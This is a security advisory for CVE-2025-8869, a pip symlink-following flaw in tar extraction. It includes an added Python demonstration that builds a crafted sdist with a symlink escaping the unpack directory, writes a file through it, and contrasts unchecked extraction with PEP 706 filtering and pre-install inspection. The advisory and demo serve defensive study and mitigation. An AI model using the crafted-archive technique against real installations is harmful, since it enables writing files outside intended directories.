PT-2025-39265 · Python+3 · Python 3.11.4+6

Published

2025-01-01

·

Updated

2026-05-07

·

CVE-2025-8869

CVSS v2.0

6.1

Medium

Vector AV:A/AC:L/Au:N/C:N/I:C/A:N
Name of the Vulnerable Software and Affected Versions

pip (affected versions not specified)

Description

pip may not properly check symbolic links when extracting tar archives if the tarfile module does not implement PEP 706 (tar extraction filters). This occurs on Python versions that do not implement PEP 706, where pip falls back to its own tar extraction routine: a crafted source distribution (sdist) can use a symbolic link to make pip write outside the directory it is unpacking into (link following; the CVSS vector reflects an integrity-only impact). Upgrading pip to a fixed version does not address all known issues that are remediated by using a Python version that implements PEP 706. Mitigations are upgrading to a version of pip that includes the fix, upgrading to a Python version that implements PEP 706 (3.9.17 and later, 3.10.12 and later, 3.11.4 and later, or 3.12 and later), applying the associated patch, or inspecting source distributions before installation.

Recommendations

Upgrade to a version of pip that includes the fix.
Upgrade to Python version 3.9.17 or later, 3.10.12 or later, 3.11.4 or later, or 3.12 or later (versions that implement PEP 706).
Apply the associated patch.
Inspect source distributions before installation.
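The following is an added example, not pip's code and not part of the advisory. It shows, on constructed sample archives embedded in the script, the three things the recommendations above rely on: detecting whether the running interpreter implements PEP 706 (the feature-detection idiom PEP 706 itself suggests), inspecting an sdist for symlink, hardlink, device and path-traversal members before installation, and the difference between an unchecked extraction (what an unpatched fallback extractor amounts to) and one that uses PEP 706's "data" filter. The malicious sdist contains a symlink pointing above the unpack directory followed by a file whose path runs through that link; the "outside" directory it escapes into stands in for any existing target such as a site-packages directory. It assumes a POSIX host where an unprivileged user can create symlinks; the package name evilpkg and all file contents are made up for the demonstration.

```python
import io
import os
import posixpath
import tarfile
import tempfile


def interpreter_implements_pep706() -> bool:
    """PEP 706's own feature-detection idiom: filters exist iff data_filter does."""
    return hasattr(tarfile, "data_filter")


def _add_file(tf: tarfile.TarFile, name: str, data: bytes) -> None:
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tf.addfile(info, io.BytesIO(data))


def build_malicious_sdist() -> bytes:
    """Constructed sample sdist: a symlink member that points above the unpack
    directory, followed by a regular file whose path runs through that link."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        _add_file(tf, "evilpkg-1.0/setup.py",
                  b"from setuptools import setup\nsetup(name='evilpkg')\n")
        link = tarfile.TarInfo("evilpkg-1.0/escape")
        link.type = tarfile.SYMTYPE
        link.linkname = "../../outside"  # resolves to a sibling of the unpack dir
        tf.addfile(link)
        _add_file(tf, "evilpkg-1.0/escape/pwned.txt", b"written through the symlink\n")
    return buf.getvalue()


def build_benign_sdist() -> bytes:
    """Constructed sample sdist containing only regular files."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        _add_file(tf, "pkg-1.0/setup.py", b"from setuptools import setup\nsetup(name='pkg')\n")
        _add_file(tf, "pkg-1.0/pkg/__init__.py", b"")
    return buf.getvalue()


def inspect_sdist(data: bytes) -> list:
    """Pre-install check: list members a legitimate sdist has no reason to contain."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf.getmembers():
            if m.name.startswith("/") or ".." in m.name.split("/"):
                findings.append(f"path escapes unpack dir: {m.name}")
            if m.issym() or m.islnk():
                # symlink targets are relative to the link's own directory,
                # hardlink targets are relative to the archive root
                base = posixpath.dirname(m.name) if m.issym() else ""
                resolved = posixpath.normpath(posixpath.join(base, m.linkname))
                outside = m.linkname.startswith("/") or resolved.startswith("..")
                kind = "symlink" if m.issym() else "hardlink"
                note = " (target outside unpack dir)" if outside else ""
                findings.append(f"{kind} {m.name} -> {m.linkname}{note}")
            if m.isdev():
                findings.append(f"device node: {m.name}")
    return findings


def extract(data: bytes, dest: str, filtered: bool) -> str:
    """filtered=True uses PEP 706's 'data' filter; filtered=False extracts with
    no checks at all, which is what an unpatched fallback extractor amounts to."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        if not interpreter_implements_pep706():
            if filtered:
                return "unavailable: no PEP 706 filters in this tarfile"
            tf.extractall(dest)
            return "extracted (unfiltered)"
        try:
            tf.extractall(dest, filter="data" if filtered else "fully_trusted")
        except tarfile.FilterError as e:
            return f"rejected: {type(e).__name__}"
    return "extracted"


def demo(filtered: bool) -> tuple:
    """Unpack the malicious sdist into a scratch dir and report whether
    pwned.txt landed in the 'outside' directory next to it."""
    with tempfile.TemporaryDirectory() as tmp:
        outside = os.path.join(tmp, "outside")  # stands in for an existing target dir
        os.mkdir(outside)
        dest = os.path.join(tmp, "unpack")
        os.mkdir(dest)
        result = extract(build_malicious_sdist(), dest, filtered)
        escaped = os.path.exists(os.path.join(outside, "pwned.txt"))
    return result, escaped


if __name__ == "__main__":
    print("PEP 706 available:", interpreter_implements_pep706())
    for f in inspect_sdist(build_malicious_sdist()):
        print("finding:", f)
    print("unfiltered:", demo(filtered=False))
    print("data filter:", demo(filtered=True))
```

On an interpreter with PEP 706, the filtered run stops at the symlink member with LinkOutsideDestinationError and nothing reaches the "outside" directory; the unfiltered run creates the link and then writes pwned.txt through it. On an interpreter without PEP 706 the filtered run reports the filters as unavailable, which is exactly the situation in which pip's fallback extractor is used and a pre-install inspection of the sdist is the remaining line of defence.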

Fix

Weakness Enumeration

Link Following (CWE-59)

Related Identifiers

AZL-67788
BDU:2025-13251
BIT-PIP-2025-8869
CVE-2025-8869
DLA-4348-1
ECHO-FFE1-1D3C-D9BC
GHSA-4xh5-x5gv-qwph
OESA-2025-2741

Affected Products

Debian
Python 3.10.12
Python 3.11.4
Python 3.12
Python 3.9.17
RED OS
Pip